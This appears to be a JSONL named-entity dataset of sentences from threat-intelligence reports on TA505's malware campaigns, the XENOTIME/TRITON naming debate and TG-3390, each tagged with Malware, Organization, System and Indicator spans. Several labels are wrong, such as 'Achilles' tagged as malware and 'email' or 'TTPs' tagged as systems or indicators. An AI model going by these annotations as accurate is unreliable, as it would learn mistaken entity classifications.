{"text": "The now infamous Dridex banking Trojan can trace much of its DNA to Cridex and Bugat .", "spans": [{"start": 17, "end": 23, "label": "Malware"}, {"start": 32, "end": 38, "label": "Malware"}, {"start": 68, "end": 74, "label": "Malware"}, {"start": 79, "end": 84, "label": "Malware"}]}
{"text": "Dridex itself appeared shortly after the Zeus banking Trojan was taken down .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 41, "end": 45, "label": "Malware"}, {"start": 54, "end": 60, "label": "Malware"}]}
{"text": "It was originally documented on July 25 , 2014 ( or June 22 , 2014 , according to Kaspersky ) and the first campaign we observed in which TA505 distributed Dridex occurred three days later on July 28 .", "spans": [{"start": 82, "end": 91, "label": "Organization"}, {"start": 138, "end": 143, "label": "Organization"}, {"start": 156, "end": 162, "label": "Malware"}]}
{"text": "Although a number of actors have distributed Dridex , TA505 operates multiple affiliate IDs , including what appears to be the earliest recorded affiliate , botnet ID 125 .", "spans": [{"start": 45, "end": 51, "label": "Malware"}, {"start": 54, "end": 59, "label": "Organization"}]}
{"text": "These early campaigns were distributed via the Lerspeng downloader while later campaigns occasionally used Pony or Andromeda as intermediate loaders to distribute various instances of Dridex .", "spans": [{"start": 47, "end": 55, "label": "Malware"}, {"start": 56, "end": 66, "label": "System"}, {"start": 107, "end": 111, "label": "Malware"}, {"start": 115, "end": 124, "label": "Malware"}, {"start": 184, "end": 190, "label": "Malware"}]}
{"text": "Although TA505 initially distributed Dridex botnet ID 125 , they were observed using botnet ID 220 in March 2015 and botnet ID 223 in December of that year .", "spans": [{"start": 9, "end": 14, "label": "Organization"}, {"start": 37, "end": 43, "label": "Malware"}]}
{"text": "Later , they were also associated with botnet IDs 7200 and 7500 .", "spans": []}
{"text": "These botnets generally target the following regions :", "spans": []}
{"text": "125: UK , US , and Canada 220: UK and Australia 223: Germany 7200: UK 7500: Australia .", "spans": []}
{"text": "TA505 continued distributing Dridex through early June 2017 using a range of email attachments .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 29, "end": 35, "label": "Malware"}, {"start": 77, "end": 82, "label": "System"}]}
{"text": "Most recently these included PDF attachments with embedded Microsoft Word documents bearing malicious macros that call PowerShell commands that install Dridex .", "spans": [{"start": 29, "end": 32, "label": "System"}, {"start": 59, "end": 68, "label": "Organization"}, {"start": 69, "end": 73, "label": "System"}, {"start": 102, "end": 108, "label": "System"}, {"start": 119, "end": 129, "label": "System"}, {"start": 152, "end": 158, "label": "Malware"}]}
{"text": "However , because of the length of time for which the group has been distributing Dridex , distribution mechanisms trace the state of the art for the last two years of email campaigns with techniques ranging from straight macro documents to a variety of zipped scripts .", "spans": [{"start": 82, "end": 88, "label": "Malware"}, {"start": 168, "end": 173, "label": "System"}, {"start": 222, "end": 227, "label": "System"}, {"start": 254, "end": 260, "label": "System"}]}
{"text": "In October 2015 , we observed several campaigns in which TA505 targeted Japanese and UK organizations with the Shifu banking Trojan .", "spans": [{"start": 57, "end": 62, "label": "Organization"}, {"start": 111, "end": 116, "label": "Malware"}, {"start": 125, "end": 131, "label": "Malware"}]}
{"text": "Shifu is relatively common in Japan but was a new addition to TA505 \u2019s toolbox .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 62, "end": 67, "label": "Organization"}]}
{"text": "It appears that they introduced Shifu after high-profile law enforcement actions impacted Dridex distribution .", "spans": [{"start": 32, "end": 37, "label": "Malware"}, {"start": 90, "end": 96, "label": "Malware"}]}
{"text": "However , TA505 was also among the first actors to return to high-volume Dridex distribution this same month , even as they demonstrated their ability to diversify and deliver threats beyond Dridex .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 73, "end": 79, "label": "Malware"}, {"start": 191, "end": 197, "label": "Malware"}]}
{"text": "As with many of their other campaigns , TA505 delivered Shifu through macro laden Microsoft Office document attachments .", "spans": [{"start": 40, "end": 45, "label": "Organization"}, {"start": 56, "end": 61, "label": "Malware"}, {"start": 70, "end": 75, "label": "System"}, {"start": 82, "end": 91, "label": "Organization"}, {"start": 92, "end": 98, "label": "System"}]}
{"text": "TA505 introduced Locky ransomware in February 2016 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 17, "end": 22, "label": "Malware"}]}
{"text": "After alternating for over four months with Dridex , Locky became the payload of choice for TA505 , eclipsing earlier campaigns in terms of volume and reach .", "spans": [{"start": 44, "end": 50, "label": "Malware"}, {"start": 53, "end": 58, "label": "Malware"}, {"start": 92, "end": 97, "label": "Organization"}]}
{"text": "TA505 stopped distributing Dridex in July 2016 , relying almost exclusively on Locky through December of that year .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 27, "end": 33, "label": "Malware"}, {"start": 79, "end": 84, "label": "Malware"}]}
{"text": "Like Dridex , Locky is also distributed in an affiliate model ; TA505 exclusively distributes Locky Affid=3 .", "spans": [{"start": 5, "end": 11, "label": "Malware"}, {"start": 14, "end": 19, "label": "Malware"}, {"start": 64, "end": 69, "label": "Organization"}, {"start": 94, "end": 99, "label": "Malware"}]}
{"text": "Low-volume campaigns distributed Dridex during much of 2015 Moderate volumes of Dridex appeared from the end of 2015 through February 2016 ; it is worth noting that these \u201c moderate volume \u201d campaigns were , at the time , the largest campaigns ever observed .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 80, "end": 86, "label": "Malware"}]}
{"text": "Alternating Dridex and Locky campaigns of varying volumes appeared through May 2016 .", "spans": [{"start": 12, "end": 18, "label": "Malware"}, {"start": 23, "end": 28, "label": "Malware"}]}
{"text": "A lull in June 2016 associated with a disruption in the Necurs botnet ; TA505 is heavily reliant on this massive botnet to send out high-volume malicious spam campaigns and disappearances of TA505 activity frequently accompany disruptions in Necurs .", "spans": [{"start": 56, "end": 62, "label": "Malware"}, {"start": 72, "end": 77, "label": "Organization"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 242, "end": 248, "label": "Malware"}]}
{"text": "Extremely high-volume campaigns distributing Locky exclusively in July 2016 , consistently delivering tens of millions of messages .", "spans": [{"start": 45, "end": 50, "label": "Malware"}]}
{"text": "Another lull in November 2016 saw the complete absence of Locky and Dridex , while high-volume campaigns reappeared in December , albeit at lower volumes than during the Q3 2016 peak .", "spans": [{"start": 58, "end": 63, "label": "Malware"}, {"start": 68, "end": 74, "label": "Malware"}]}
{"text": "An expected break following the 2016-2017 winter holidays turned into an unexplained three-month hiatus for TA505 .", "spans": [{"start": 108, "end": 113, "label": "Organization"}]}
{"text": "Large-scale Dridex and Locky campaigns returned in Q2 2017 , although none reached the volumes we observed in mid-2016 .", "spans": [{"start": 12, "end": 18, "label": "Malware"}, {"start": 23, "end": 28, "label": "Malware"}]}
{"text": "Later campaigns saw new attachment types , even as Dridex and Locky payloads remained largely unchanged .", "spans": [{"start": 51, "end": 57, "label": "Malware"}, {"start": 62, "end": 67, "label": "Malware"}]}
{"text": "Locky distribution ceased in June and July but returned in August with volumes rivaling the peaks of 2016 .", "spans": [{"start": 0, "end": 5, "label": "Malware"}]}
{"text": "TA505 turned to URLs in early August 2017 to distribute Locky , finally eschewing the document or zipped script attachments that have characterized the majority of their Locky campaigns since February 2016 ; most of these URLs linked to malicious documents and scripts .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 56, "end": 61, "label": "Malware"}, {"start": 98, "end": 104, "label": "System"}, {"start": 170, "end": 175, "label": "Malware"}]}
{"text": "By later August , TA505 had turned back to large attachment campaigns , primarily distributing various zipped scripts that downloaded Locky .", "spans": [{"start": 18, "end": 23, "label": "Organization"}, {"start": 103, "end": 109, "label": "System"}, {"start": 134, "end": 139, "label": "Malware"}]}
{"text": "The group continued this pattern with occasional URL campaigns and attached HTML files bearing malicious links .", "spans": [{"start": 76, "end": 80, "label": "System"}]}
{"text": "TA505 first introduced Rockloader in April 2016 as an intermediate loader for Locky .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 23, "end": 33, "label": "Malware"}, {"start": 67, "end": 73, "label": "System"}, {"start": 78, "end": 83, "label": "Malware"}]}
{"text": "At that time , Rockloader was the initial payload downloaded by malicious attached JavaScript files .", "spans": [{"start": 15, "end": 25, "label": "Malware"}, {"start": 83, "end": 93, "label": "System"}]}
{"text": "Once Rockloader was installed , it downloaded Locky and , in some cases , Pony and Kegotip .", "spans": [{"start": 5, "end": 15, "label": "Malware"}, {"start": 46, "end": 51, "label": "Malware"}, {"start": 74, "end": 78, "label": "Malware"}, {"start": 83, "end": 90, "label": "Malware"}]}
{"text": "Pony is another loader with information stealing capabilities while Kegotip is an credential and email address harvesting malware strain that would appear in a small number of TA505 campaigns the following year as the primary payload .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 16, "end": 22, "label": "System"}, {"start": 68, "end": 75, "label": "Malware"}, {"start": 97, "end": 102, "label": "System"}, {"start": 176, "end": 181, "label": "Organization"}]}
{"text": "Bart ransomware appeared for exactly one day on June 24 , 2016 .", "spans": [{"start": 0, "end": 4, "label": "Malware"}]}
{"text": "It was a secondary payload downloaded by Rockloader , the initial payload in a large email campaign using zipped JavaScript attachments .", "spans": [{"start": 41, "end": 51, "label": "Malware"}, {"start": 85, "end": 90, "label": "System"}, {"start": 106, "end": 112, "label": "System"}, {"start": 113, "end": 123, "label": "System"}]}
{"text": "The Bart ransom screen was visually similar to Locky \u2019s but Bart had one important distinction : it could encrypt files without contacting a command and control server .", "spans": [{"start": 4, "end": 8, "label": "Malware"}, {"start": 47, "end": 52, "label": "Malware"}, {"start": 60, "end": 64, "label": "Malware"}]}
{"text": "However , we have not seen Bart since , suggesting that this was either an experiment or that the ransomware did not function as expected for TA505 .", "spans": [{"start": 27, "end": 31, "label": "Malware"}, {"start": 142, "end": 147, "label": "Organization"}]}
{"text": "TA505 briefly distributed the Kegotip information stealer in April 2017 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 30, "end": 37, "label": "Malware"}, {"start": 38, "end": 57, "label": "System"}]}
{"text": "Across two campaigns of several million messages each , the actor used both macro laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs .", "spans": [{"start": 76, "end": 81, "label": "System"}, {"start": 88, "end": 97, "label": "Organization"}, {"start": 98, "end": 102, "label": "System"}, {"start": 117, "end": 123, "label": "System"}, {"start": 124, "end": 132, "label": "System"}, {"start": 160, "end": 166, "label": "Malware"}, {"start": 187, "end": 190, "label": "System"}]}
{"text": "Kegotip is an infostealer ( credentials and email addresses ) used to facilitate other crimeware activities .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 14, "end": 25, "label": "System"}, {"start": 44, "end": 49, "label": "System"}]}
{"text": "It steals credentials from various FTP clients , Outlook , and Internet Explorer .", "spans": [{"start": 35, "end": 38, "label": "Indicator"}, {"start": 49, "end": 56, "label": "System"}, {"start": 63, "end": 80, "label": "System"}]}
{"text": "It also will gather email addresses scraped from files stored on the computer .", "spans": [{"start": 20, "end": 25, "label": "System"}]}
{"text": "This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors .", "spans": []}
{"text": "TA505 introduced Jaff ransomware in May 2017 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 17, "end": 21, "label": "Malware"}]}
{"text": "Jaff was not dramatically different from other ransomware strains .", "spans": [{"start": 0, "end": 4, "label": "Malware"}]}
{"text": "The payment portal was initially similar to the one used by Locky and Bart .", "spans": [{"start": 60, "end": 65, "label": "Malware"}, {"start": 70, "end": 74, "label": "Malware"}]}
{"text": "It was primarily notable for its high-volume campaigns and its association with TA505 , given the actor \u2019s propensity for massive campaigns and ability to dominate the email landscape .", "spans": [{"start": 80, "end": 85, "label": "Organization"}, {"start": 168, "end": 173, "label": "System"}]}
{"text": "Jaff appeared in multi-million message campaigns for roughly a month and then promptly disappeared as soon as a decryptor was released in mid-June 2017 .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 112, "end": 121, "label": "System"}]}
{"text": "The Trick , also known as Trickbot , is another banking Trojan that TA505 first began distributing in June of 2017 , although we have observed The Trick in the wild since fall 2016 , usually in regionally targeted campaigns .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 26, "end": 34, "label": "Malware"}, {"start": 56, "end": 62, "label": "Malware"}, {"start": 68, "end": 73, "label": "Organization"}, {"start": 147, "end": 152, "label": "Malware"}]}
{"text": "It is generally considered a descendant of the Dyreza banking Trojan and features mutliple modules .", "spans": [{"start": 47, "end": 53, "label": "Malware"}, {"start": 62, "end": 68, "label": "Malware"}]}
{"text": "The main bot is responsible for persistence , the downloading of additional modules , loading affiliate payloads , and loading updates for the malware .", "spans": []}
{"text": "As with much of the malware distributed by TA505 , The Trick has appeared in frequent , high-volume campaigns .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 55, "end": 60, "label": "Malware"}]}
{"text": "The campaigns used a mix of attached zipped scripts ( WSF , VBS ) , malicious Microsoft Office documents ( Word , Excel ) , HTML attachments , password-protected Microsoft Word documents , links to malicious JavaScript , and other vectors .", "spans": [{"start": 37, "end": 43, "label": "System"}, {"start": 54, "end": 57, "label": "System"}, {"start": 60, "end": 63, "label": "System"}, {"start": 78, "end": 87, "label": "Organization"}, {"start": 88, "end": 94, "label": "System"}, {"start": 107, "end": 111, "label": "System"}, {"start": 114, "end": 119, "label": "System"}, {"start": 124, "end": 128, "label": "System"}, {"start": 162, "end": 171, "label": "Organization"}, {"start": 172, "end": 176, "label": "System"}, {"start": 208, "end": 218, "label": "System"}]}
{"text": "The last TA505 campaigns featuring The Trick appeared in mid-September 2017 with payloads alternating between Locky and The Trick .", "spans": [{"start": 9, "end": 14, "label": "Organization"}, {"start": 39, "end": 44, "label": "Malware"}, {"start": 110, "end": 115, "label": "Malware"}, {"start": 124, "end": 129, "label": "Malware"}]}
{"text": "Philadelphia ransomware has been circulating since September 2016 .", "spans": [{"start": 0, "end": 12, "label": "Malware"}]}
{"text": "It first attracted our attention in April of this year when we observed an actor customizing the malware for use in highly targeted campaigns .", "spans": []}
{"text": "In a brief stint , TA505 distributed it in one large campaign in July , but we have not seen them use it since .", "spans": [{"start": 19, "end": 24, "label": "Organization"}]}
{"text": "GlobeImposter is another ransomware strain that saw relatively small-scale distribution until TA505 began including it in malicious spam campaigns at the end of July 2017 .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 94, "end": 99, "label": "Organization"}]}
{"text": "TA505 primarily distributed GlobeImposter in zipped script attachments through the beginning of September 2017 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 28, "end": 41, "label": "Malware"}, {"start": 45, "end": 51, "label": "System"}]}
{"text": "Again , GlobeImposter is not particularly innovative but TA505 elevated the ransomware from a regional variant to a major landscape feature during roughly six weeks of large campaigns .", "spans": [{"start": 8, "end": 21, "label": "Malware"}, {"start": 57, "end": 62, "label": "Organization"}]}
{"text": "TA505 is arguably one of the most significant financially motivated threat actors because of the extraordinary volumes of messages they send .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "The variety of malware delivered by the group also demonstrates their deep connections to the underground malware scene .", "spans": []}
{"text": "At the time of writing , Locky ransomware remains their malware of choice , even as the group continues to experiment with a variety of additional malware .", "spans": [{"start": 25, "end": 30, "label": "Malware"}]}
{"text": "The history of TA505 is instructive because they: Have proven to be highly adaptable , shifting techniques and malware frequently to \u201c follow the money \u201d , while largely sticking to successful strategies where possible Are flexible , using largely interchangeable components , innovating where necessary on the malware front and using off-the-shelf malware where possible Operate at massive scale , consistently driving global trends in malware distribution and message volume .", "spans": [{"start": 15, "end": 20, "label": "Organization"}]}
{"text": "Each of these elements makes TA505 a magnifying lens through which to consider the framework employed by many modern threat actors .", "spans": [{"start": 29, "end": 34, "label": "Organization"}]}
{"text": "Such a framework typically consists of five elements :", "spans": []}
{"text": "Actor : The attacker organization ; real humans driven by various motivations -- In the case of TA505 , the motivations are financial .", "spans": [{"start": 96, "end": 101, "label": "Organization"}]}
{"text": "Vector : The delivery mechanism ; email via attacker-controlled or leased spam botnet -- Necurs for TA505 -- remains a dominant vector , and certainly the vector of choice for this actor .", "spans": [{"start": 34, "end": 39, "label": "System"}, {"start": 89, "end": 95, "label": "Malware"}, {"start": 100, "end": 105, "label": "Organization"}]}
{"text": "Hoster : The sites hosting malware ; if malware is not directly attached to email , then macro enabled documents , malicious scripts , or exploit kits will pull payloads from these servers .", "spans": [{"start": 76, "end": 81, "label": "System"}, {"start": 89, "end": 94, "label": "System"}]}
{"text": "TA505 almost exclusively hosts malware in this way , although they vary the means of installing their final payloads on victim machines .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "Payload : The malware ; software that will enable the attacker to make use of ( control , exfiltrate data from , or download more software to ) the target computer .", "spans": []}
{"text": "For TA505 , the payloads have shifted over the years and months of their activity , but their sending and hosting infrastructure make these changes relatively simple to implement .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "C&C : The command and control channel that serves to relay commands between the installed malware and attackers .", "spans": [{"start": 0, "end": 3, "label": "System"}, {"start": 10, "end": 29, "label": "System"}]}
{"text": "TA505 operates a variety of C&C servers , allowing it to be resilient in the case of takedowns , sinkholes , and other defensive operations .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 28, "end": 31, "label": "System"}]}
{"text": "This framework enables attackers to operate in robust , horizontally segmented ecosystems , specializing in developing certain parts of the framework , and selling or leasing to others ; such frameworks are resistant to takedowns and individual component failures .", "spans": []}
{"text": "But such frameworks also increase attackers' detection surface , that is , their susceptibility to discovery .", "spans": []}
{"text": "In the case of TA505 , while most elements of the framework are well-developed , their reliance on the Necurs botnet for the sending high-volume malicious spam - a key component of the Vector element above - appears to be their Achilles heel .", "spans": [{"start": 15, "end": 20, "label": "Organization"}, {"start": 103, "end": 109, "label": "Malware"}, {"start": 228, "end": 236, "label": "Malware"}]}
{"text": "A XENOTIME to Remember : Veles in the Wild .", "spans": [{"start": 2, "end": 10, "label": "Organization"}, {"start": 25, "end": 30, "label": "System"}]}
{"text": "Release_Time : 2019-12-04", "spans": []}
{"text": "Report_URL : https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/", "spans": []}
{"text": "\u201c When I use a word , \u201d Humpty Dumpty said , in rather a scornful tone , \u201c it means just what I choose it to mean\u2014neither more nor less. \u201d \u2013 Through the Looking Glass , Lewis Carroll FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \u201c TRITON actor \u201d when preparing to deploy the TRITON S-MAL/TRISIS malware framework in 2017 .", "spans": [{"start": 153, "end": 166, "label": "Organization"}, {"start": 183, "end": 190, "label": "Organization"}, {"start": 287, "end": 293, "label": "Malware"}, {"start": 331, "end": 350, "label": "Malware"}]}
{"text": "Overall , the post does a commendable job in making public findings previously only privately shared ( presumably by FireEye , and in several reports I authored for my employer , Dragos ) to threat intelligence customers .", "spans": [{"start": 117, "end": 124, "label": "Organization"}, {"start": 179, "end": 185, "label": "Organization"}]}
{"text": "As such , the blog continues to push forward the narrative of how ICS attacks are enabled through prepositioning and initial intrusion operations \u2013 an item I have discussed at length .", "spans": []}
{"text": "Yet one point of confusion in the blog comes at the very start : referring to the entity responsible for TRITON as the \u201c TRITON actor \u201d .", "spans": [{"start": 105, "end": 111, "label": "Malware"}, {"start": 121, "end": 127, "label": "Malware"}]}
{"text": "This seems confusing as FireEye earlier publicly declared the \u201c TRITON actor \u201d as a discrete entity , linked to a Russian research institution , and christened it as \u201c TEMP.Veles \u201d .", "spans": [{"start": 24, "end": 31, "label": "Organization"}, {"start": 64, "end": 70, "label": "Malware"}, {"start": 168, "end": 178, "label": "Organization"}]}
{"text": "In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON , with subsequent public presentations at Cyberwarcon and the Kaspersky Lab sponsored Security Analyst Summit essentially linking TRITON and the research institute ( and therefore TEMP.Veles ) as one in the same .", "spans": [{"start": 38, "end": 48, "label": "Organization"}, {"start": 51, "end": 58, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}, {"start": 160, "end": 166, "label": "Malware"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 229, "end": 242, "label": "Organization"}, {"start": 253, "end": 276, "label": "Organization"}, {"start": 297, "end": 303, "label": "Malware"}, {"start": 347, "end": 357, "label": "Organization"}]}
{"text": "Yet the most-recent posting covering TTPs from initial access through prerequisites to enable final delivery of effects on target ( deploying TRITON S-MAL/TRISIS ) avoids the use of the TEMP.Veles term entirely .", "spans": [{"start": 37, "end": 41, "label": "Indicator"}, {"start": 142, "end": 161, "label": "Malware"}, {"start": 186, "end": 196, "label": "Organization"}]}
{"text": "In subsequent discussion , FireEye personnel indicate that there was not \u201c an avalanche of evidence to substantiate \u201d anything more than \u201c TRITON actor \u201d \u2013 summing matters by indicating this term \u201c is the best we \u2019ve got for the public for now \u201d .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 139, "end": 145, "label": "Malware"}]}
{"text": "Meanwhile , parallel work at Dragos ( my employer , where I have performed significant work on the activity described above ) uncovered similar conclusions concerning TTPs and behaviors , for both the 2017 event and subsequent activity in other industrial sectors .", "spans": [{"start": 29, "end": 35, "label": "Organization"}, {"start": 167, "end": 171, "label": "Indicator"}]}
{"text": "Utilizing Diamond Model methodology for characterizing activity by behaviors attached to victims , we began tracking TRITON S-MAL/TRISIS and immediate enabling activity as a distinct activity group ( collection of behaviors , infrastructure , and victimology ) designated XENOTIME .", "spans": [{"start": 117, "end": 136, "label": "Malware"}, {"start": 272, "end": 280, "label": "Organization"}]}
{"text": "Based on information gained from discussion with the initial TRITON S-MAL/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye \u2019s analysis published in April 2019 , described in various media .", "spans": [{"start": 61, "end": 80, "label": "Malware"}, {"start": 151, "end": 157, "label": "Organization"}, {"start": 242, "end": 249, "label": "Organization"}]}
{"text": "At this stage , we have two similar , parallel constructions of events \u2013 the how behind the immediate deployment and execution of TRITON S-MAL/TRISIS \u2013 yet dramatically different responses in terms of attribution and labeling .", "spans": [{"start": 130, "end": 149, "label": "Malware"}]}
{"text": "Since late 2018 , based upon the most-recent posting , FireEye appears to have \u201c walked back \u201d the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \u201c TRITON actor \u201d , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": [{"start": 55, "end": 62, "label": "Organization"}, {"start": 130, "end": 140, "label": "Organization"}, {"start": 188, "end": 194, "label": "Malware"}, {"start": 211, "end": 217, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}]}
{"text": "Given that both organizations appear to describe similar ( if not identical ) activity , any reasonable person could ( and should ) ask \u2013 why the inconsistency in naming and identification? Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos \u2019 approaches with respect to the \u201c TRITON actor \u201d comes down to fundamental philosophical differences in methodology .", "spans": [{"start": 431, "end": 438, "label": "Organization"}, {"start": 443, "end": 449, "label": "Organization"}, {"start": 485, "end": 491, "label": "Malware"}]}
{"text": "As wonderfully described in a recent public posting , FireEye adheres to a naming convention based upon extensive data collection and activity comparison , designed to yield the identification of a discrete , identifiable entity responsible for a given collection of activity .", "spans": [{"start": 54, "end": 61, "label": "Organization"}]}
{"text": "This technique is precise and praiseworthy \u2013 yet at the same time , appears so rigorous as to impose limitations on the ability to dynamically adjust and adapt to emerging adversary activity . ( Or for that matter , even categorize otherwise well-known historical actors operating to the present day , such as Turla . ) FireEye \u2019s methodology may have particular limitations in instances where adversaries ( such as XENOTIME and presumably TEMP.Veles ) rely upon extensive use of publicly-available , commonly-used tools with limited amounts of customization .", "spans": [{"start": 310, "end": 315, "label": "Organization"}, {"start": 320, "end": 327, "label": "Organization"}, {"start": 416, "end": 424, "label": "Organization"}, {"start": 440, "end": 450, "label": "Organization"}]}
{"text": "In such cases , utilizing purely technical approaches for differentiation ( an issue I lightly touched on in a recent post ) becomes problematic , especially when trying to define attribution to specific , \u201c who-based \u201d entities ( such as a Russian research institute ) .", "spans": []}
{"text": "My understanding is FireEye labels entities where definitive attribution is not yet possible with the \u201c TEMP \u201d moniker ( hence , TEMP.Veles ) \u2013 yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting .", "spans": [{"start": 20, "end": 27, "label": "Organization"}, {"start": 129, "end": 139, "label": "Organization"}, {"start": 161, "end": 168, "label": "Organization"}]}
{"text": "Based on the public blog post \u2013 which also indicated that FireEye is responding to an intrusion at a second facility featuring the same or similar observations \u2013 this is presumably not for lack of evidence , yet the \u201c downgrade \u201d occurs all the same .", "spans": [{"start": 58, "end": 65, "label": "Organization"}]}
{"text": "In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) .", "spans": [{"start": 16, "end": 24, "label": "Organization"}]}
{"text": "In personally responding to several incidents across multiple industry sectors since early 2018 matching TTPs from the TRITON S-MAL/TRISIS event , these items proved consistent and supported the creation of the XENOTIME activity group .", "spans": [{"start": 105, "end": 109, "label": "Indicator"}, {"start": 119, "end": 138, "label": "Malware"}, {"start": 211, "end": 219, "label": "Organization"}]}
{"text": "This naming decision was founded upon the underlying methodology described in the Diamond Model of intrusion analysis .", "spans": []}
{"text": "As such , this decision does not necessarily refer to a specific institution , but rather a collection of observations and behaviors observed across multiple , similarly-situated victims .", "spans": []}
{"text": "Of note , this methodology of naming abstracts away the \u201c who \u201d element \u2013 XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": [{"start": 74, "end": 82, "label": "Organization"}]}
{"text": "Ultimately , the epistemic foundation of the behavior-based naming approach makes this irrelevant for tracking ( and labeling for convenience sake ) observations .", "spans": []}
{"text": "Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \u201c the TRITON actor \u201d ) describe the same phenomena , yet at the same time appear different .", "spans": [{"start": 113, "end": 121, "label": "Organization"}, {"start": 126, "end": 136, "label": "Organization"}, {"start": 174, "end": 180, "label": "Malware"}]}
{"text": "This question of perception and accuracy rests upon the underlying epistemic framework and the goal conceived for that framework in defining an adversary : FireEye \u2019s methodology follows a deductive approach requiring the collection of significant evidence over time to yield a conclusion that will be necessary given the premises ( the totality of evidence suggests APTxx ) ; the Dragos approach instead seeks an inductive approach , where premises may all be true but the conclusion need not necessarily follow from them given changes in premises over time or other observations not contained within the set ( thus , identified behaviors strongly suggests an activity group , defined as X ) .", "spans": [{"start": 156, "end": 163, "label": "Organization"}, {"start": 381, "end": 387, "label": "Organization"}]}
{"text": "From an external analysts \u2019 point of view , the wonder is , which is superior to the other? And my answer for this is : neither is perfect , but both are useful \u2013 depending upon your goals and objectives .", "spans": []}
{"text": "But rather than trying to pursue some comparison between the two for identification of superiority ( an approach that will result in unproductive argument and social media warring ) , the point of this post is to highlight the distinctions between these approaches and how \u2013 in the case of \u201c the TRITON actor \u201d \u2013 they result in noticeably different conclusions from similar datasets .", "spans": [{"start": 296, "end": 302, "label": "Malware"}]}
{"text": "One reason for the distinction may be differences in evidence , as FireEye \u2019s public reporting notes two distinct events of which they are aware of and have responded to related to \u201c the TRITON actor \u201d while Dragos has been engaged several instances \u2013 thus , Dragos would possess more evidence to cement the definition of an activity group , while FireEye \u2019s data collection-centric approach would require far more observations to yield an \u201c APT \u201d .", "spans": [{"start": 67, "end": 74, "label": "Organization"}, {"start": 187, "end": 193, "label": "Malware"}, {"start": 208, "end": 214, "label": "Organization"}, {"start": 259, "end": 265, "label": "Organization"}, {"start": 348, "end": 355, "label": "Organization"}]}
{"text": "Yet irrespective of this , it is confusing why the previously-declared \u201c TEMP \u201d category was walked back as this has led to not small amount of confusion \u2013 in both technical and non-technical audiences \u2013 as to just what FireEye \u2019s blog post refers .", "spans": [{"start": 220, "end": 227, "label": "Organization"}]}
{"text": "Thus respected journalists ( at least by me ) conflate the \u201c TRITON actor is active at another site \u201d with \u201c TRITON malware was identified at another site \u201d .", "spans": [{"start": 61, "end": 67, "label": "Malware"}, {"start": 109, "end": 115, "label": "Malware"}]}
{"text": "In this case , we \u2019re seeing a definite problem with the overly-conservative naming approach used as it engenders confusion in a significant subset of the intended audience .", "spans": []}
{"text": "While some may dismiss adversary or activity naming as so much marketing , having a distinct label for something allows for clearer communication and more accurate discussion .", "spans": []}
{"text": "Furthermore , conflating adversaries with tools , since tools can be repurposed or used by other entities than those first observed deploying them , leads to further potential confusion as the \u201c X actor \u201d is quickly compressed in the minds of some to refer to any and all instantiations of tool \u201c X \u201d .", "spans": [{"start": 195, "end": 196, "label": "System"}, {"start": 297, "end": 298, "label": "System"}]}
{"text": "Overall , the discussion above may appear so much splitting of hairs or determining how many angels can dance on the head of a pin \u2013 yet given the communicative impacts behind different naming and labeling conventions , this exploration seems not merely useful but necessary .", "spans": []}
{"text": "Understanding the \u201c how \u201d and \u201c why \u201d behind different entity classifications of similar ( or even the same ) activity allows us to move beyond the dismissive approach of \u201c everyone has their names for marketing purposes \u201d to a more productive mindset that grasps the fundamental methodologies that ( should ) drive these decisions .", "spans": []}
{"text": "Threat Group 3390 Cyberespionage .", "spans": [{"start": 0, "end": 17, "label": "Organization"}]}
{"text": "CTU researchers have observed TG-3390 actors using tools that are favored by multiple threat groups :", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 37, "label": "Organization"}]}
